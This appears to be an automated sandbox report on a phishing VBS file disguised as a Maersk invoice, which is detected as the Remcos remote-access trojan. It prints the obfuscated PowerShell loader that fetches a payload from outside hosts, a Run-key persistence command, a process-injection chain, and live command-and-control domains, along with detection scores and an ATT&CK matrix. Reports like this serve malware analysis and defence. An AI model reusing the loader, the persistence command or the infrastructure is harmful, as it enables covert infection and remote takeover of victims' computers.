Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,	Jump to behavior

Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerg
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/02 01:48:02 Program Manager]
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managern
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:1
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:0
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager1
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager6be679r
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managery
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/02 01:48:09 Program Manager]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	321 Scripting	Valid Accounts	11 Windows Management Instrumentation	321 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	112 Process Injection	2 Obfuscated Files or Information	LSASS Memory	113 System Information Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	21 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	213 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Maersk_BL_Invoice_Packinglist.vbs	12%	Virustotal		Browse
Maersk_BL_Invoice_Packinglist.vbs	13%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Link
janbours92harbu02.duckdns.org	11%	Virustotal	Browse
contemega.com.do	2%	Virustotal	Browse
janbours92harbu03.duckdns.org	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://contoso.com/License	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://103.19	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://103.195.237.43/Outgassed.em	0%	Avira URL Cloud	safe
https://contemega.com.do/Ou	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgassed.	0%	Avira URL Cloud	safe
https://contemega.com.d	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://103.195.	0%	Avira URL Cloud	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://contemega.com.do/O	0%	Avira URL Cloud	safe
https://contemega.c	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgass	0%	Avira URL Cloud	safe
http://103.19	0%	Virustotal		Browse
janbours92harbu02.duckdns.org	100%	Avira URL Cloud	malware
https://contemega.com.do	0%	Avira URL Cloud	safe
http://103.195.237.43/Outga	0%	Avira URL Cloud	safe
https://contemega.com.do/Outgasse	0%	Avira URL Cloud	safe
janbours92harbu02.duckdns.org	11%	Virustotal		Browse
http://103.195.	0%	Virustotal		Browse
https://contemega.com.do	2%	Virustotal		Browse
